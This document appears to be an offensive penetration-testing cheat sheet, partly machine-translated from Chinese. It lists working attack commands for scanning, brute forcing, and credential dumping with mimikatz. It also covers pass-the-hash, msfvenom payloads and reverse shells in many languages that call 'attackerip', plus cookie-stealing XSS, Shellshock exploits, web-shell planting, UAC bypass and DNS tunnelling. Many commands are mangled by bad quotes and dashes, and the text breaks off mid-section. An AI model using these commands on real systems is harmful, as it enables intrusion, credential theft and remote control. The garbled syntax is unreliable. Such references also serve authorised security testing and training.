NMAP scanning strategy
``` #Applies to the
best nmap scanning strategy for all size networks #Host
discovery, generates a list of surviving hosts
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep “Status: Up” Discovery. Gnmap | cut -f 2 -d ‘ ‘ > LiveHosts.txt
# Port discovery, found most common ports
# http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
$ nmap -sS -T4 — Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn — top-ports 3674 -oG 3674 -iL LiveHosts.txt #Port
Discovery , found all ports, but the UDP port scan will be very slow
$ nmap -sS -T4 -Pn -p 0–65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0–65535 -oN FullUDP -iL LiveHosts.txt
# Display TCP\UDP port
$ grep “open” FullTCP|cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ |xargs | sed ‘s/ /,/g’|awk ‘{print “T:” $0}’
$ grep “open” FullUDP|cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ |xargs | sed ‘s/ /,/g’|awk ‘{print “ U:”$0}’ #Detecting
Service Version
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
#
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# System And service detection
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21–25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
```
Nmap — Dodge Firewall
```
#
$ Nmap -f
# modify the default MTU size, but must be a multiple of 8 (8,16,24,32 etc.)
$ nmap — mtu 24
# Generate random number of scams
$ nmap -D RND: 10 [target]
# Manually specify the IP used for spoofing
$ nmap -D decoy1,decoy2,decoy3 etc.
# botnet scan, first need to find the botnet’s IP
$ nmap -sI [Zombie IP] [Target IP]
# Specify the source port number
$ nmap — source-port 80 IP
# Add a random amount of data after each scan packet
$ nmap — data-length 25 IP
# MAC address spoofing, can generate MAC addresses for different hosts
$ nmap — spoof-mac Dell/Apple/3Com IP
```
Nmap Web vulnerability scanning
```
cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/ … _vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
Nmap -sS -sV — script=vulscan/vulscan.nse target
nmap -sS -sV — script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
Nmap -sS -sV — script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV — script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap — sV — script=vuln target
nmap -PN -sS -sV — script=all –script-args vulscancorrelation=1 target
```
Use DIRB to blast directory
```
Note: DIRB is a tool dedicated to blasting directories. It has been installed by default in Kali. Similar tools include foreign patator, dirsearch, DirBuster, domestic sword and so on.
Dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
Patator — All-round brute force test tool
# git clone https://github.com/lanjelot/patator.git /usr/share/patator
# SMTP blast
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo=’ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0= /usr/share/john/password.lst -x ignore:fgrep=’incorrect password or account name’
```
Use Fierce to blast DNS
Note: Fierce checks if the DNS server allows zone transfers. If allowed, zone transfers are made and the user is notified, if not allowed, the hostname can be enumerated by querying the DNS server. Similar tools: subDomainsBrute and SubBrute etc.
```
# http://ha.ckers.org/fierce/
$ ./fierce.pl -dns example.com
$ ./fierce.pl –dns example.com –wordlist myWordList. Txt
```
Scan the web service
```
nikto -C all -h http://IP
``` with Nikto Scan
WordPress
```
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url Http://IP/ –enumerate p
```
HTTP Fingerprint
```
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint — h http://IP -s signatures.txt
```
Scanning with Skipfish
Note: Skipfish is a web application security scouting tool that Skipfish uses to generate an interactive site map using recursive crawlers and dictionary-based probes. The map will be output after passing the security check.
```
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
```
Use NC scan
```
nc -v -w 1 target -z 1–1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21–25 — z; done
```
Unicornscan
Note: Unicornscan is a tool for information gathering and security auditing.
```
us -H -msf -Iv 192.168.56.101 -p 1–65535
us -H -mU -Iv 192.168.56.101 -p 1–65535
-H Resolve hostname
-m scan type in the report generation phase (sf — tcp , U — udp)
-Iv — Detailed
```
Use Xprobe2 to identify operating system fingerprints
```
xprobe2 -v -p tcp:80:open IP
```
Enumerate Samba
```
nmblookup -A target
smbclient //MOUNT/ Share -I target -N
rpcclient -U “” target
enum4linux target
```
Enumerate SNMP
```
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
```
Windows cmd
```
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system(“start cmd.exe /k $cmd”)
sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32-bit system
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64-bit system
```
PuTTY connection tunnel
```
Forward remote port to destination address
plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 IP
```
Meterpreter port forwarding
```
# https://www.offensive -security.com/metasploit-unleashed/portfwd/
# Forward remote port to destination address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
```
turn on RDP service
```
Reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
Netsh firewall set service remotedesktop enable
```
Turn off Windows Firewall
```
netsh firewall set opmode disable
Meterpreter VNC\RDP
# https://www.offensive-security.c … ing-remote-desktop/
run getgui -u admin 1234 -p
RUN VNC -p 5043
`` `
use Mimikatz
get Windows username and password in clear text
` ``
git clone https://github.com/gentilkiwi/mimikatz.git
Privilege :: Debug
sekurlsa :: Full logonPasswords
`` `
get Hash value
```
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
```
or
```
Apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
```
at or
```
meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c: ::
msf> use exploit / Windows / smb / PsExec
msf exploit (PsExec)> the SET payload Windows / Meterpreter / reverse_tcp
msf exploit (PsExec)> the SET smbpass e52cac67419a9a224a3b108f3fa6cb6d: 8846f7eaee8fb117ad06bdd830b7586c
msf exploit (PsExec)> exploit
Meterpreter> shell
`` `
use Hashcat crack password
```
hashcat -m 400 -a 0 hash /root/rockyou.txt
```
Use NC to grab Banner information
```
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
<enter>
<enter>
```
Use NC to bounce shell on Windows
```
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r( Random) -w(wait) 1 192.168.0.10 -z(i/o error) 1–1000
```
Find SUID\SGID root file
```
# Find SUID root file
find / -user root -perm -4000 -print
# Find the SGID root file:
find / -group root -perm -2000 -print
# Find the SUID and SGID files:
Find / -perm -4000 -o -perm -2000 -print
# Find files that do not belong to any user:
find / -nouser -print
# Find files that do not belong to any user group:
find / -nogroup -print
# Find soft links and It points to:
find / -type l -ls
Python shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Python\Ruby\PHP HTTP server
python2 -m SimpleHTTPServer
python3 -m http.server
ruby — Rwebrick -e “WEBrick::HTTPServer.new(:Port => 8888, :D
ocumentRoot => Dir.pwd).start”
php -S 0.0.0.0:8888
```
Get the PID corresponding to the process
```
fuser — Nv tcp 80
fuser -k -n tcp 80
```
Use Hydra to blast RDP
```
hydra -l admin -P /root/Desktop/passwords -S XXXX rdp
```
Mount remote Windows shared folder
```
smbmount //XXXX/c$ /mnt/remote/ -o username=user,password=pass,rw
Kali Compile Exploit
gcc -m32 -o output32 hello.c ( 32 bit)
gcc -m64 -o output hello.c (64 bit)
```
Kali Compile Windows Exploit
```
wget -O mingw-get-setup.exe http://sourceforge.net/projects/ … -setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root /.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
```
NASM command
```
Note: NASM’s full name, The Netwide Assembler, is an assembly language compiler based on the 80x86 and x86–64 platforms. It was originally designed to implement cross-platform and modular features of the compiler program.
Nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
```
SSH penetration
```
ssh -D 127.0.0.1:1080 — p 22 user@IP
Add
socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target
```
SSH penetrates from one network to another
```
ssh -D 127.0.0.1:1080 -p 22 user1@ IP1
Add
socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add
socks4 127.0.0.1 1081 in /etc/proxychains.conf proxychains commands target
```
Use metasploit Penetrate
```
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
```
or
```
# https://www.offensive-security.com/metasploit-unleashed/pivoting/
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address : 10.1.13.2
```
基于 CSV 文件查询 Exploit-DB
```
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit “Linux Kernel”
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
```
MSF Payloads
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 — platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT= 443 -e x86/shikata_ga_nai -b “\x00” -a x86 — platform win -fc
```
MSF generates a Meterpreter Shell that bounces under Linux
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 — platform linux -o shell
```
MSF generates bounce shell (C Shellcode )
```
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 — platform win -fc
```
MSF generates a bounce Python Shell
```
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
```
MSF ASP Shell
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 — platform win -o shell.asp
```
MSF Bash Shell
```
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
```
MSF 生成反弹 PHP Shell
```
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
add <?php at the beginning
perl -i~ -0777pe’s/^/<?php \n/’ shell.php
```
MSF 生成反弹 Win Shell
```
-p Windows msfvenom / Meterpreter / reverse_tcp lhost = <Your IP Address> LPORT = <Your Port Connect to the On> -a -f EXE x86 — platform win -o Shell.exe
`` `
Linux common security command
` ``
# Use uid to find the corresponding program
find / -uid 0 -perm -4000
# Find where write permission
find / -perm -o=w
# Find the file containing dots and spaces in the name
find / -name “ “ -print
find / — Name “..” -print
find / -name “. “ -print
find / -name “ “-print
# Find files that are not owned by
find / /nouser
# Find unlinked files
lsof +L1
# Get the information of the process open port
lsof -i
# Look at the ARP table for strange things
arp -a
# View all Account
getent passwd
# View all user groups
getent group
# List all users’ crontabs
For user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
# Generate random password
cat /dev/urandom | tr -dc ‘a-zA-Z0–9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
# Find all unmodifiable The file
find. | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
# Make the file unmodifiable
chattr -i file
```
Windows buffer overflow exploit command
```
msfvenom — p windows/shell_bind_tcp -a x86 — platform win -b “\x00” -fc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=443 -a x86 — platform win -e x86/shikata_ga_nai -b “\x00 “ -fc
COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
# Commonly used commands:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value And add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest
```
SEH — Structured exception handling
Note: SEH (“Structured Exception Handling”), that is, structured exception handling, is windows The operating system provides the programmer with powerful handler errors or unusual weapons.
```
# https://en.wikipedia.org/wiki/Mi … ling_mechanisms#SEH
# http://baike.baidu.com/view/243131.htm
!mona suggest
!mona nosafeseh
nseh=”\xeb \x06\x90\x90" (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32, POPr32, RETN)
```
ROP (DEP)
Note: ROP (“Return-Oriented Programming “) is a computer security exploit technology that allows an attacker to execute code in the context of security defenses, such as unexecutable memory and code signing.
DEP (“Data Execution Prevention”) is a set of software and hardware technology that strictly distinguishes code and data in memory to prevent data from being executed as code.
```
# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://zh.wikipedia.org/wiki/%E … 1%E7%BC%96%E7%A8%8B
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
# http://baike.baidu.com/item/DEP/7694630
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a”
!mona rop -m *.dll -cpb “\x00 \x09\x0a” (auto suggest)
```
ASLR — Address space pattern randomization
```
# https://en.wikipedia.org/wiki/Address_space_layout_randomization
# http://baike.baidu.com/view/3862310 .htm
!mona noaslr
```
EGG Hunter Technology
Egg hunting This technique can be classified as “hierarchical shellcode”, which mainly allows you to find your actual (smaller) with a small piece of specially crafted shellcode. ) shellcode (our ‘egg’), the principle is to search our memory for our final shellcode. for more details on the links I added to the code comments.
```
# https://www.corelan.be/index.php … -win32-egg-hunting/
#Http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\ XEB \ XC4 (Jump Backward -60)
BUFF + = lxxllxxl the shell
! Mona Egg -t ‘w00t’
`
the GDB Debugger common commands
`
# set breakpoints
BREAK _start *
# execute the next command
next
STEP
n-
S
# Continue to execute
continue
c
# data
checking ‘REGISTERS’ and ‘MEMORY’
# Display the value of the register: (Decimal, Binary, Hex)
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)
# Display the value of a specific memory address
command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
```
BASH Shell
```
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
```
PERL Shell
```
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
# Win
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -e ‘use Socket;$i=”10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
```
RUBY Shell
```
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”443");while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
# Win
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”443");while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘f=TCPSocket.open(“attackerip”,”443").to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
```
PYTHON Shell
```
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“attackerip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
```
PHP 反弹 Shell
```
php -r ‘$sock=fsockopen(“attackerip”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’
```
JAVA 反弹 Shell
```
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor() # If the -e parameter is disabled, try the following command nc -e /bin/sh 192.168.37.10 443 nc -e /bin/sh attackerip 4444 ``` NETCAT bounces the shell
```
# mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe /bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/pp && nc attackerip 4443 0/tmp/
# You installed the wrong version of netcat, please try the following command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
```
TELNET bounces Shell
```
# if netcat is not available or /dev/tcp
mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
```
XTERM bounces Shell
```
# http://baike. Baidu.com/view/418628.htm
# Turn on the X server (:1 — listen on TCP port 6001)
apt-get install xnest Xnest
:1
# Remember to authorize the connection from the target IP
xterm -display 127.0.0.1:1
# Authorized access to
xhost +targetip
# Connect to attacker server on the target machine
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm
```
XSS note
```
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(“< iframes > src=http://IP:PORT </ iframes >”)
<script>document.location=http://IP:PORT</script>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“;!–”<XSS>=&amp;{()}
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>””>
<IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;>
<IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(“>< iframes http://google.com < iframes >)
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
<Img src=asdf onerror=alert(document.cookie)> remote server# ```SSH Over SCTP (using Socat)
```
# listen on port 80/SCTP and the sshd port is 22/TCP
$ socat SCTP-LISTEN:80, fork TCP:localhost:22
#local
# change SERVER_IP to the address of the remote server, listening SCTP port 80
$ socat TCP-LISTEN: 1337, fork SCTP: SERVER_IP: 80
# Create socks proxy
# Replace username and -p port number
$ ssh -lusername localhost -D 8080 -p 1337
```
Use onion Network
``` #installation
service
$ apt-get install tor torsocks
# bind ssh to tor service port 80
# /etc/tor/torrc
SocksPolicy accept 127.0.0.1
SocksPolicy accept 192.168.0.0/16
Log notice file /var/log/
Tor /notices.log RunAsDaemon 1
HiddenServiceDir /var/lib/tor/ssh_hidden_service/
HiddenServicePort 80 127.0.0.1:22
PublishServerDescriptor 0
$ /etc/init.d/tor start
$ cat /var/lib/tor/ssh_hidden_service/hostname
3l5zstvt1zk5jhl662.onion
# ssh Client Connection
$ apt-get install torsocks
$ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80
` ``
Metagoofil — Metadata Collection Tool
Note: Metagoofil is a tool for collecting information using Google.
```
# http://www.edge-security.com/metagoofil.php
# It can automatically retrieve and analyze files in the search engine, and also has other functions such as providing Mac address, username list, etc.
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.htmlUsing
Shellshock
# A tool to discover and utilize the server Shellshock
# https://github.com/nccgroup/shocker
$ ./shocker.py -H 192.168.56.118 — command “/bin/cat /etc/passwd” -c /cgi-bin/status — verbose
#check file
$ echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.56.118 80
# Binding shell
$ echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.56.118 80
# get Shell
$ nc -l -p 443
$ echo “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.56.118 80 # Get Docker’s Root ``` Get Docker’s Root
```
# User must be in the docker group
ek@victum:~/docker-test$ id
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
ek@victum:~$ mkdir docker-test
ek@victum:~$ cd docker-test
ek@victum:~$ cat > Dockerfile
FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME [ $WORKDIR ]
WORKDIR $WORKDIR
<< EOF
ek@victum:~$ docker build -t my-docker-image .
ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
‘cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh’
./sh
whoami
# root
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c ‘cat /stuff/shadow’
```
Use DNS Tunnel to bypass firewall
```
# Let data and commands use DNS tunneling to bypass firewall check
# dnscat2 Support upload and download commands from target host to get files, data and programs
# Server (attacker)
$ apt -get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2. rb
dnscat2> New the session the ESTABLISHED: 16059
dnscat2> the session -i 16059
# client (target)
# https://downloads.skullsecurity.org/dnscat2/
# https://github.com/lukebaggett/dnscat2-powershell
$ dnscat — -host <dnscat server_ip>
Compile Assemble code
$ nasm -f elf32 simple32.asm -o simple32.o
$ ld -m elf_i386 simple32.o simple32
$ nasm -f elf64 simple.asm -o simple.o
$ ld simple.o -o simple
# Generate SSH key used by shell
$ wget -O — -q “http://domain.tk/sh.php?cmd=whoami"
$ wget -O — -q “http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \”\” “
$ wget -O — -q “http://domain.tk/sh.php?cmd=cat /tmp/id_rsa”
# add tempuser
$ useradd -m tempuser
$ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
$ wget -O — -q “http://domain.tk/sh.php?cmd=cat /tmp/id_rsa” > /home/tempuser/.ssh/authorized_keys
$ chmod 700 /home/tempuser/.ssh/authorized_keys
$ chown -R tempuser:tempuser /home/tempuser/.Ssh
# rebound ssh shell
$ wget -O — -q “http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N — f tempuser@<attacker_ip>”
```
Get the shell with the POST remote command
```
attacker:~$ curl -i -s -k -X ‘POST’ — data-binary $’IP=%3Bwhoami&submit=submit’ ‘http://victum.tk/command.php'
attacker:~$ curl -i -s -k -X ‘POST’ — data-binary $’IP=%3Becho+%27%3C%3Fphp+system%28 %24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit’ ‘http://victum.tk/command.php'
attacker:~$ curl Http://victum.tk/shell.php?cmd=id
# Download the shell (phpshell.php) on the server
http://victum.tk/shell.php?cmd=p … 8%22phpshell.php% 22 ,%20fopen%28%22 http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27
# Run nc and execute phpshell.php
attacker:~$ nc -nvlp 1337
``` Bounce
as an administrator on Win7 Shell with system permissions
```
msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
# Display account configuration
net user <login>
# Kali Download psexec
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
# exploit the powershell script and upload psexec.exe to the target machine
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = “http://192.168.56.102/PsExec.exe" >> script.ps1
echo $client.DownloadFile($targetlocation,”psexec.exe”) >> script.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
# exploit the powershell and upload the danger.exe to the target machine
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = “http://192.168.56.102/danger.exe" >> script2.ps1
echo $client.DownloadFile($targetlocation,”danger.exe”) >> script2.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
# Bypassing UAC with precompiled binaries:
https://github.com /hfiref0x/UACME
# Use the powershell script to upload https://github.com/hfiref0x/UACM … ompiled/Akagi64.exe to the target machine
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = “http://192.168.56.102/Akagi64.exe" >> script3.ps1
echo $client.DownloadFile($targetlocation,”Akagi64.exe”) >> script3.ps1
Powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1 #Create
listener on Kali
nc -lvvp 4444
# Run the danger.exe
Akagi64.exe with Akog64 with system privileges 1 C:\Users\User\Desktop\danger.exe
# Create a listener on Kali
nc -lvp 4444
# Next will bounce back to us a shell that has been granted rights
# Run system. PsExec Run the danger.exe
psexec.exe –i –d –accepteula –s danger.exe
```
Bounce on Win7 as a normal user with system permissions Shell
```
